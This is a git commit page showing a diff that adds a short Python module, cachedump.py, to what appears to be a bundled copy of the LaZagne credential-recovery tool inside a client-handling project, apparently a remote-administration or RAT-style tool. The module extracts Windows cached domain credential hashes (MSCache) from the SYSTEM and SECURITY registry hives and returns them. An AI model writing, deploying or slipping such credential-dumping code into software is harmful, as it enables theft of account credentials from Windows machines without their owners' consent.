diff options
author | AL-LCL <alvin@alvinhavel.com> | 2023-05-19 11:01:49 +0200 |
---|---|---|
committer | AL-LCL <alvin@alvinhavel.com> | 2023-05-19 11:01:49 +0200 |
commit | 20dbeb2f38684c65ff0a4b99012c161295708e88 (patch) | |
tree | a5b8445f55da2fbbb92443b68e9d7354a290c598 /foreign/client_handling/lazagne/softwares/windows/cachedump.py |
Diffstat (limited to 'foreign/client_handling/lazagne/softwares/windows/cachedump.py')
-rw-r--r-- | foreign/client_handling/lazagne/softwares/windows/cachedump.py | 19 |
1 files changed, 19 insertions, 0 deletions
diff --git a/foreign/client_handling/lazagne/softwares/windows/cachedump.py b/foreign/client_handling/lazagne/softwares/windows/cachedump.py new file mode 100644 index 0000000..4e9564e --- /dev/null +++ b/foreign/client_handling/lazagne/softwares/windows/cachedump.py @@ -0,0 +1,19 @@ +# -*- coding: utf-8 -*- +from .creddump7.win32.domcachedump import dump_file_hashes +from foreign.client_handling.lazagne.config.module_info import ModuleInfo +from foreign.client_handling.lazagne.config.winstructure import get_os_version +from foreign.client_handling.lazagne.config.constant import constant + + +class Cachedump(ModuleInfo): + def __init__(self): + ModuleInfo.__init__(self, 'mscache', 'windows', system_module=True) + + def run(self): + is_vista_or_higher = False + if float(get_os_version()) >= 6.0: + is_vista_or_higher = True + + mscache = dump_file_hashes(constant.hives['system'], constant.hives['security'], is_vista_or_higher) + if mscache: + return ['__MSCache__', mscache] |